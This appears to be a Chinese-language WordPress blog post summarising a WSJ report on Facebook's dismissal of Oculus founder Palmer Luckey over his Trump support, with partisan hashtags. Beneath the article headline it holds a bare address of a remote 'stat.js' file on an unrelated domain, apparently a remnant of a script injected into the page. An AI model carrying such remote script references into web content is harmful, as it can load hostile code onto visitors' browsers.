分類
筆記

臉書的政治霸凌?

為什麼臉書的VR項目Oculus創辦人Palmer Luckey被辭退?

本人稱:「因為我支持川普。」

臉書內部e-mails顯示CEO Zuckerberg曾施壓要求長期支持川普的Luckey轉向支持自由派候選人Gary Johnson。不服從的結果就是…「被迫另有生涯規劃地離職」

而早在川普還是「誰是接班人」實境秀主持人時代,青少年Luckey就已經寫信給偶像川普,敦請競選美國總統!

2016年9月某媒體揭露Luckey曾捐助「反希拉蕊克林頓」組織$1萬美元。

臉書員工在公司內部討論區表達對此項捐款行為的憤怒,並質疑公司為何聘僱這種反對希拉蕊的人。VR單位部分遊戲開發工程師甚至公然拒絕與Luckey合作。

公司內部討論區隨後發佈了一篇Luckey道歉文,表示自己其實是自由派(libertarian),也會乖乖投票給Johnson,決不會票投川普。

But!

臉書的Deputy General Counsel Paul Grewal 於2016年9月寫信告訴Luckey的委任律師指出:這篇道歉文其實是Mark Zuckerberg寫的!(What?!)

Luckey已經委任律師對臉書提出訴訟,搬凳子看好戲!

#美國好民主喔
#美國左謬是最虛偽
#拿台灣價值霸凌他人也不過是民主之必然
#民主跟自由是沒有關係的

WSJ: Why Did Facebook Fire a Top Executive? Hint: It Had Something to Do With Trump
https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s